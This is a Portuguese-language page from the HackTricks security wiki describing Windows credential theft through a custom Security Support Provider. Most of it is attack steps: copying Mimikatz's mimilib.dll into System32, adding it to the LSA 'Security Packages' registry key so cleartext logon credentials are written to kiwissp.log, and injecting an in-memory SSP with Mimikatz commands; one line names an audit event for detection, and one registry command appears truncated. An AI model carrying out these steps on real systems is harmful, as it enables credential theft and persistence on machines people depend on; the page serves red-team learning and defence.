Custom SSP

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
Adquira o swag oficial PEASS & HackTricks
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
Compartilhe seus truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

SSP Personalizado

Aprenda o que é um SSP (Provedor de Suporte de Segurança) aqui. Você pode criar seu próprio SSP para capturar em texto claro as credenciais usadas para acessar a máquina.

Mimilib

Você pode usar o binário mimilib.dll fornecido pelo Mimikatz. Isso registrará em um arquivo todas as credenciais em texto claro. Solte o dll em C:\Windows\System32\ Obtenha uma lista de Pacotes de Segurança LSA existentes:

atacante@alvo

```bash PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Adicione `mimilib.dll` à lista do Fornecedor de Suporte de Segurança (Security Support Provider list - Security Packages):
```powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

E após reiniciar, todas as credenciais podem ser encontradas em texto claro em C:\Windows\System32\kiwissp.log

Na memória

Você também pode injetar isso diretamente na memória usando o Mimikatz (observe que pode ser um pouco instável/não funcionar):

privilege::debug
misc::memssp

Isso não sobreviverá a reinicializações.

Mitigação

ID do Evento 4657 - Auditoria da criação/mudança de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

PreviousConstrained Delegation NextDCShadow

Last updated 3 months ago